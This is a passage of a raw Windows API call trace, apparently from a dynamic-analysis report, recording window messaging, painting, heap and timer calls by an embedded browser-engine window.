lpMem=0x68c168 | out: hHeap=0x5e0000) returned 1 [0164.727] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0164.727] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0164.727] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0164.734] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0164.734] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098355272045) returned 1 [0164.734] DeleteObject (ho=0x23040a81) returned 1 [0164.735] GetCurrentThreadId () returned 0xb48 [0164.735] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0164.735] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098355400057) returned 1 [0164.735] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098355407161) returned 1 [0164.735] KillTimer (hWnd=0x30316, uIDEvent=0x200d) returned 1 [0164.736] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.736] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.736] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.736] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0164.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.736] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0164.737] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0164.737] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098355604778) returned 1 [0164.737] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0164.737] NtdllDefWindowProc_W () returned 0x0 [0164.738] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.738] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.738] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.738] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3098355702135) returned 1 [0164.739] SetEvent (hEvent=0x304) returned 1 [0164.739] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.739] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.739] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.739] KillTimer (hWnd=0x30316, uIDEvent=0x2010) returned 1 [0164.740] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3098355880547) returned 1 [0164.740] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098355887007) returned 1 [0164.740] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098355897570) returned 1 [0164.740] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098355903499) returned 1 [0164.740] SetEvent (hEvent=0x668) returned 1 [0164.741] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.741] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.741] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.741] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.802] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.802] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.802] KillTimer (hWnd=0x30316, uIDEvent=0x200f) returned 1 [0164.802] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0166.317] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0166.317] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0166.323] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0167.994] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0167.994] NtdllDefWindowProc_W () returned 0x0 [0167.994] NtdllDefWindowProc_W () returned 0x0 [0167.994] NtdllDefWindowProc_W () returned 0x0 [0167.996] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0167.996] IsIconic (hWnd=0x103e0) returned 0 [0167.996] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0167.996] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0167.996] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0167.996] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0167.996] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0167.996] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0167.996] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0167.996] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x10040a78 [0167.996] GetUpdateRgn (hWnd=0x103e2, hRgn=0x10040a78, bErase=0) returned 1 [0167.996] DeleteObject (ho=0x10040a78) returned 1 [0167.996] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0167.996] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0167.997] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0167.997] NtdllDefWindowProc_W () returned 0x0 [0167.997] GetCurrentThreadId () returned 0xb48 [0167.997] GetCurrentThreadId () returned 0xb48 [0167.998] NtdllDefWindowProc_W () returned 0x0 [0167.999] NtdllDefWindowProc_W () returned 0x0 [0168.000] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.000] NtdllDefWindowProc_W () returned 0x0 [0168.000] NtdllDefWindowProc_W () returned 0x0 [0168.000] NtdllDefWindowProc_W () returned 0x0 [0168.000] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.001] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0168.001] NtdllDefWindowProc_W () returned 0x0 [0168.001] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.001] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0168.001] NtdllDefWindowProc_W () returned 0x1 [0168.004] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0168.004] GetFocus () returned 0x0 [0168.005] SetFocus (hWnd=0x103e2) returned 0x0 [0168.005] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.005] GetMessagePos () returned 0x11e01d6 [0168.005] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x199a74 | out: plResult=0x199a74) returned 0x0 [0168.006] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.006] GetMessagePos () returned 0x11e01d6 [0168.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.006] memcpy_s (in: _Destination=0xd967e0, _DestinationSize=0x118, _Source=0xd966c0, _SourceSize=0x118 | out: _Destination=0xd967e0) returned 0x0 [0168.006] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcea0 [0168.006] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.006] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.007] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.008] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcea0 | out: hHeap=0x5e0000) returned 1 [0168.008] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.008] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.008] memcpy_s (in: _Destination=0xd96900, _DestinationSize=0x118, _Source=0xd966c0, _SourceSize=0x118 | out: _Destination=0xd96900) returned 0x0 [0168.008] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd60 [0168.008] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.008] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0168.009] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0168.009] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.010] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd60 | out: hHeap=0x5e0000) returned 1 [0168.010] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x199334 | out: plResult=0x199334) returned 0x0 [0168.010] GetCurrentThreadId () returned 0xb48 [0168.015] GetCurrentThreadId () returned 0xb48 [0168.015] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.015] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0168.015] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103e2, phIMC=0x199e44 | out: phIMC=0x199e44*=0x0) returned 0x0 [0168.015] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0168.016] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199b70 | out: lpPoint=0x199b70) returned 1 [0168.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.016] GetCurrentThreadId () returned 0xb48 [0168.016] GetCurrentThreadId () returned 0xb48 [0168.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.016] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.016] GetCurrentThreadId () returned 0xb48 [0168.017] GetCurrentThreadId () returned 0xb48 [0168.017] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.017] GetCurrentThreadId () returned 0xb48 [0168.017] GetCurrentThreadId () returned 0xb48 [0168.017] GetCurrentThreadId () returned 0xb48 [0168.017] GetMessagePos () returned 0x11e01d6 [0168.018] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x199da4 | out: plResult=0x199da4) returned 0x1 [0168.018] NtdllDefWindowProc_W () returned 0x0 [0168.018] GetCurrentThreadId () returned 0xb48 [0168.019] GetAsyncKeyState (vKey=17) returned 0 [0168.019] GetAsyncKeyState (vKey=16) returned 0 [0168.020] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0168.020] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.020] memcpy_s (in: _Destination=0xd96a20, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd96a20) returned 0x0 [0168.020] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0168.020] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.020] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.020] memcpy_s (in: _Destination=0xd96b40, _DestinationSize=0x118, _Source=0xd96a20, _SourceSize=0x118 | out: _Destination=0xd96b40) returned 0x0 [0168.021] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0168.021] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.021] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0168.021] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0168.021] GetMessagePos () returned 0x11e01d6 [0168.022] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x105, wParam=0x1b, lParam=0xe0010001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0168.022] NtdllDefWindowProc_W () returned 0x0 [0168.022] GetCurrentThreadId () returned 0xb48 [0168.022] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.022] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.022] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.023] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0168.023] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.023] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0168.023] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.024] GetCurrentThreadId () returned 0xb48 [0168.024] GetCurrentThreadId () returned 0xb48 [0168.024] IsWinEventHookInstalled (event=0x8005) returned 0 [0168.024] GetCurrentThreadId () returned 0xb48 [0168.024] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0168.024] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.025] GetCurrentThreadId () returned 0xb48 [0168.025] GetCurrentThreadId () returned 0xb48 [0168.025] GetFocus () returned 0x103e2 [0168.025] GetCurrentThreadId () returned 0xb48 [0168.025] IsWinEventHookInstalled (event=0x8005) returned 0 [0168.025] GetCurrentThreadId () returned 0xb48 [0168.025] GetCurrentThreadId () returned 0xb48 [0168.025] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a198 | out: lpPoint=0x19a198) returned 1 [0168.025] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.026] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a0 | out: lpPoint=0x19a1a0) returned 1 [0168.026] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.026] GetCurrentThreadId () returned 0xb48 [0168.026] GetCurrentThreadId () returned 0xb48 [0168.026] IsWinEventHookInstalled (event=0x800a) returned 0 [0168.026] GetCurrentThreadId () returned 0xb48 [0168.027] LsSetDoc () returned 0x0 [0168.027] LsCreateLine () returned 0x0 [0168.033] LsDestroyLine () returned 0x0 [0168.033] GetFocus () returned 0x103e2 [0168.033] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0168.033] _CIsqrt () returned 0x3ff0027f [0168.033] _CIsqrt () returned 0x3ff0027f [0168.033] _CIatan2 () returned 0x20 [0168.034] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098685310747) returned 1 [0168.034] GetCurrentThreadId () returned 0xb48 [0168.034] GetCurrentThreadId () returned 0xb48 [0168.034] GetCurrentThreadId () returned 0xb48 [0168.034] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3098685338255) returned 1 [0168.034] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3098685343505) returned 1 [0168.034] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3098685351374) returned 1 [0168.035] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3098685362839) returned 1 [0168.035] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3098685368014) returned 1 [0168.035] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3098685384587) returned 1 [0168.035] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3098685392010) returned 1 [0168.035] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.035] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.035] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.035] SetEvent (hEvent=0x304) returned 1 [0168.036] WTSGetActiveConsoleSessionId () returned 0x1 [0168.036] GetCurrentProcessId () returned 0xe14 [0168.036] GetCurrentThreadId () returned 0xb48 [0168.036] SetEvent (hEvent=0x668) returned 1 [0168.036] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0168.037] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.037] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.037] GetAsyncKeyState (vKey=17) returned 0 [0168.037] GetAsyncKeyState (vKey=16) returned 0 [0168.037] GetAsyncKeyState (vKey=18) returned 0 [0168.037] TranslateMessage (lpMsg=0x19a5a8) returned 1 [0168.037] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.037] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0168.037] GetCurrentThreadId () returned 0xb48 [0168.037] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.038] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.038] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.070] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.071] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.071] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.071] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0168.071] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0168.071] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0168.071] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098688995203) returned 1 [0168.072] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0168.072] NtdllDefWindowProc_W () returned 0x0 [0168.072] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0168.072] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0168.072] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0168.072] KillTimer (hWnd=0x30316, uIDEvent=0x2012) returned 1 [0168.072] PostMessageW (hWnd=0x30316, Msg=0x113, wParam=0x2000, lParam=0x0) returned 1 [0168.072] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098689140651) returned 1 [0168.073] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0168.073] GetFocus () returned 0x103e2 [0168.073] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.073] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcb84 | out: lpRect=0xcfcb84) returned 1 [0168.073] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.073] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098689221383) returned 1 [0168.073] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x51010a85 [0168.073] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x11040a78 [0168.073] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0168.073] GetRandomRgn (hdc=0x51010a85, hrgn=0x11040a78, i=4) returned 1 [0168.073] OffsetRgn (hrgn=0x11040a78, x=-507, y=-333) returned 2 [0168.073] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0168.074] GetRegionData (in: hrgn=0x11040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0168.074] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6bf90 [0168.074] GetRegionData (in: hrgn=0x11040a78, nCount=0x30, lpRgnData=0x9f6bf90 | out: lpRgnData=0x9f6bf90) returned 0x30 [0168.075] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.075] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6bf90 | out: hHeap=0x5e0000) returned 1 [0168.075] DeleteObject (ho=0x11040a78) returned 1 [0168.075] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c5b0 [0168.075] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c5b0) returned 0x8d040a6c [0168.075] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c5b0 | out: hHeap=0x5e0000) returned 1 [0168.075] SelectClipRgn (hdc=0x51010a85, hrgn=0x8d040a6c) returned 2 [0168.075] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c310 [0168.078] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c310) returned 0x24040a81 [0168.078] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c310 | out: hHeap=0x5e0000) returned 1 [0168.078] ValidateRgn (hWnd=0x103e2, hRgn=0x24040a81) returned 1 [0168.078] DeleteObject (ho=0x8d040a6c) returned 1 [0168.078] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.078] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0168.079] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.079] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0168.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, 